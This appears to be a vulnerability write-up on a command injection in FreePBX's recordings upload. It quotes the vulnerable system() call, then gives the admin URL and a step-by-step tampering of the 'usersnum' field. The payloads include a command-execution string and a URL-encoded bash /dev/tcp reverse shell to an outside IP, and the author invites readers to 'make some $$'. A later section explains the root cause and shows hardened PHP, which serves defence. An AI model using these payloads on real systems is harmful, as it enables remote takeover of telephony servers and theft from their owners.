<h6><?php
echo _("Click \"SAVE\" when you are satisfied with your recording");
echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
<input type="submit" value="<?php echo _("Save")?>"
tabindex="<?php echo ++$tabindex;?>"></h6>
<?php recordings_form_jscript(); ?>
</form>
</div>
<?php
}
Actually, as you can see, there are many exploitable lines there, but here I
am interested in this line:
system("chmod g+rw ".$destfilename);
If you trace the function flow, you will notice that $destfilename gets
part of its value from the parameter $_REQUEST['usersnum'].
The function is called via
Target/admin/config.php?type=setup&display=recordings
Before uploading, open Firebug,
search for usersnum
and edit the value to
fa;id>faris;fax
or, for a back-connection, use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
and you are ready to dominate, or even make some $$ if you're interested ;)
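The root cause is that a request parameter reaches system() unvalidated. The following is an added example (not FreePBX code) that puts the command-building pattern from the function above next to a hardened version that validates the value and drops the shell entirely; the function names, the directory and the expected numeric format of usersnum are assumptions for illustration.

```php
<?php
// Vulnerable pattern (assumed reconstruction of the flow described above):
// whatever arrives in $_REQUEST['usersnum'] becomes part of a shell command,
// so shell metacharacters in it are interpreted by /bin/sh.
function build_chmod_command_vulnerable(string $usersnum, string $suffix): string
{
    $destfilename = '/var/lib/asterisk/sounds/custom/' . $usersnum . '-' . $suffix;
    return 'chmod g+rw ' . $destfilename;   // would be passed to system()
}

// Hardened version: allow-list the inputs, keep the path inside the intended
// directory, and apply the mode with a filesystem call instead of a shell.
// Returns the file path on success, null on rejection or failure.
function apply_group_rw_hardened(string $usersnum, string $suffix): ?string
{
    // usersnum is expected to be a numeric id; suffix a short extension.
    if (!preg_match('/^[0-9]{1,20}$/', $usersnum)
        || !preg_match('/^[a-z0-9]{1,8}$/', $suffix)) {
        return null;
    }
    $base = '/var/lib/asterisk/sounds/custom';
    $destfilename = $base . '/' . $usersnum . '-' . $suffix;

    // Defense in depth: the resolved parent directory must still be $base.
    $real = realpath(dirname($destfilename));
    if ($real === false || strncmp($real . '/', $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }

    // No shell involved: add group read/write (the effect of "chmod g+rw")
    // to the existing permission bits. If a shell command were unavoidable,
    // every untrusted argument would need escapeshellarg().
    $mode = @fileperms($destfilename);
    if ($mode === false || !@chmod($destfilename, ($mode & 0777) | 0060)) {
        return null;
    }
    return $destfilename;
}
```

Logging rejected values from the validation step also gives operators a cheap detection signal for tampering attempts against this parameter.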
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
FreePBX
-------
At present the vendor has not released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version: